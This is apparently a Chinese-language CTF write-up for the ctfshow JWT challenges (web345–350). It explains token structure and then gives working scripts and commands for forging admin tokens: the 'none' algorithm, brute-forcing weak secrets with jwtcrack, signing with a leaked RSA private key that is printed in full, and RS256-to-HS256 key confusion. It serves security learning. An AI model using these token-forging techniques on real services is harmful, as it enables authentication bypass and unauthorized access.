ctfshow jwt web入门
jwt令牌由三部分组成,由.分割
Header
Payload
Signature
header示例
{'typ': 'JWT','alg': 'HS256'
}# typ:声明类型
# alg:声明加密的算法 通常直接使用 HMAC SHA256
需要注意的是因为header部分是固定的所以,生成的base64也是固定的以eyJh开头的
payload示例
{"sub": "1234567890","name": "John Doe"
}标准中注册的声明 (建议但不强制使用)
# iss: jwt签发者
# sub: jwt所面向的用户
# aud: 接收jwt的一方
# exp: jwt的过期时间,这个过期时间必须要大于签发时间
# nbf: 定义在什么时间之前,该jwt都是不可用的
# iat: jwt的签发时间
# jti: jwt的唯一身份标识,主要用来作为一次性token,从而回避重放攻击
signature
是一个签证信息,这个签证信息由三部分组成header (base64后的)
payload (base64后的)
secret注意:secret是保存在服务器端的,JWT的签发生成也是在服务器端的,secret就是用来进行JWT的签发和JWT的验证
在线jwt工具
web345
没有加密只能手动编码
{"alg": "None","typ": "jwt"
}
ewogICJhbGciOiAiTm9uZSIsCiAgInR5cCI6ICJqd3QiCn0
[{"sub": "admin"}
]
WwogIHsKICAgIAogICAgInN1YiI6ICJhZG1pbiIKICB9Cl0
这样修改之后是不太好改的至少我的电脑是这样,然后header和signature没有所以我们直接传需要验证的那一段即可
cookie:
WwogIHsKICAgIAogICAgInN1YiI6ICJhZG1pbiIKICB9Cl0
web346
我们要把加密换成none,user换成admin,使用脚本
import base64
def jwtBase64Encode(x):return base64.b64encode(x.encode('utf-8')).decode().replace('+', '-').replace('/', '_').replace('=', '')
header = '{"typ":"JWT","alg":"none"}'
payload = '{"iss":"admin","iat":1717308697,"exp":1717315897,"nbf":1632212749,"sub":"admin",' \'"jti":"ef284a95660debcc71201fbd57541e07"} 'print(jwtBase64Encode(header)+'.'+jwtBase64Encode(payload)+'.')
然后就可以了
web347
不能改none了我发现只能爆密钥但是不知道为啥我就是爆不出来,既然是弱的就猜一个123456对了刚好
cd c-jwt-cracker-master./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNzMyOTk2NywiZXhwIjoxNzE3MzM3MTY3LCJuYmYiOjE3MTczMjk5NjcsInN1YiI6InVzZXIiLCJqdGkiOiIxZTA5YTdmODJmM2NhZTJiOGQ4MjU4N2I1ZTI4NTcwMCJ9.3mUyUCWS0vkgEEyDVYY_kuzVzT5qvCCIneHUn1ic4Qo
web348
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNzMzMjU2OCwiZXhwIjoxNzE3MzM5NzY4LCJuYmYiOjE3MTczMzI1NjgsInN1YiI6InVzZXIiLCJqdGkiOiIwZTZiMmRjM2RmZTRjOWM3ZWM3YjM2YzFlNTI4ODk4MCJ9.3UFCVH-G-__fqZvFVdN8wWmxR54Uoi38Hnj-Sp1sv0Q
这个一秒就出了
web349
/* GET home page. */
router.get('/', function(req, res, next) {res.type('html');var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });res.cookie('auth',token);res.end('where is flag?');});router.post('/',function(req,res,next){var flag="flag_here";res.type('html');var auth = req.cookies.auth;var cert = fs.readFileSync(process.cwd()+'//public/public.key'); // get public keyjwt.verify(auth, cert, function(err, decoded) {if(decoded.user==='admin'){res.end(flag);}else{res.end('you are not admin');}});
});
审计上面的代码发现在public.key有公钥
扫后台发现私钥
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDNioS2aSHtu6WIU88oWzpShhkb
+r6QPBryJmdaR1a3ToD9sXDbeni5WTsWVKrmzmCk7tu4iNtkmn/r9D/bFcadHGnX
YqlTJItOdHZio3Bi1J2Elxg8IEBKx9g6RggTOGXQFxSxlzLNMRzRC4d2PcA9mxjA
bG1Naz58ibbtogeglQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDNioS2aSHtu6WIU88oWzpShhkb+r6QPBryJmdaR1a3ToD9sXDb
eni5WTsWVKrmzmCk7tu4iNtkmn/r9D/bFcadHGnXYqlTJItOdHZio3Bi1J2Elxg8
IEBKx9g6RggTOGXQFxSxlzLNMRzRC4d2PcA9mxjAbG1Naz58ibbtogeglQIDAQAB
AoGAE+mAc995fvt3zN45qnI0EzyUgCZpgbWg8qaPyqowl2+OhYVEJq8VtPcVB1PK
frOtnyzYsmbnwjZJgEVYTlQsum0zJBuTKoN4iDoV0Oq1Auwlcr6O0T35RGiijqAX
h7iFjNscfs/Dp/BnyKZuu60boXrcuyuZ8qXHz0exGkegjMECQQD1eP39cPhcwydM
cdEBOgkI/E/EDWmdjcwIoauczwiQEx56EjAwM88rgxUGCUF4R/hIW9JD1vlp62Qi
ST9LU4lxAkEA1lsfr9gF/9OdzAsPfuTLsl+l9zpo1jjzhXlwmHFgyCAn7gBKeWdv
ubocOClTTQ7Y4RqivomTmlNVtmcHda1XZQJAR0v0IZedW3wHPwnT1dJga261UFFA
+tUDjQJAERSE/SvAb143BtkVdCLniVBI5sGomIOq569Z0+zdsaOqsZs60QJAYqtJ
V7EReeQX8693r4pztSTQCZBKZ6mJdvwidxlhWl1q4+QgY+fYBt8DVFq5bHQUIvIW
zawYVGZdwvuD9IgY/QJAGCJbXA+Knw10B+g5tDZfVHsr6YYMY3Q24zVu4JXozWDV
x+G39IajrVKwuCPG2VezWfwfWpTeo2bDmQS0CWOPjA==
-----END RSA PRIVATE KEY-----
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' });
console.log(token)
我不能用在线网页了,只能用node.js来写
或者用python
import jwt
private = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=private, algorithm='RS256'))
用bp发包,这里我就是忘了一个错误,应该是POST发包,别忘了上面的js文件说的是POST查看
web350
user.js
module.exports = {items: [{username: 'CTFSHOW', password: '123456'}]
};
common.js
module.exports = {copy:copy
};function copy(object1, object2){for (let key in object2) {if (key in object2 && key in object1) {copy(object1[key], object2[key])} else {object1[key] = object2[key]}}}
var express = require('express');
var router = express.Router();
var jwt = require('jsonwebtoken');
var fs = require('fs');/* GET home page. */
router.get('/', function(req, res, next) {res.type('html');var privateKey = fs.readFileSync(process.cwd()+'//routes/private.key');var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });res.cookie('auth',token);res.end('where is flag?');});router.post('/',function(req,res,next){var flag="flag_here";res.type('html');var auth = req.cookies.auth;var cert = fs.readFileSync(process.cwd()+'//routes/public.key'); // get public keyjwt.verify(auth, cert,function(err, decoded) {if(decoded.user==='admin'){res.end(flag);}else{res.end('you are not admin'+err);}});
});
module.exports = router;
公钥
-----CTFSHOW 36D BOY -----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDfdIGdsPuxSGPuosgarjZ7zO4t
HHmQ7+6WUiKBA0ykcXe6aK9zcVVKCcEwyMbENgTF4Et8RjZ3NKs1Co74Q+4gII5G
IgQFSS0PzTOKmoTY1fnA6+jqBquV4RnU283kgdaKmkaSRdiwsW2EaagMgZdG6WJk
65RmH98bgnIAGW5nawIDAQAB
-----END PUBLIC KEY-----
公钥给我们了,我们可以利用非对称转为对称算法进行攻击,利用公钥进行加密解密
RS256->HS256
const jwt = require('jsonwebtoken'); //导入库
var fs = require('fs'); //导入js库方便读文件操作
var privateKey = fs.readFileSync('./public.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' }); 把RS256改为HS256就可以用公钥解出来
console.log(token) 最后的cookie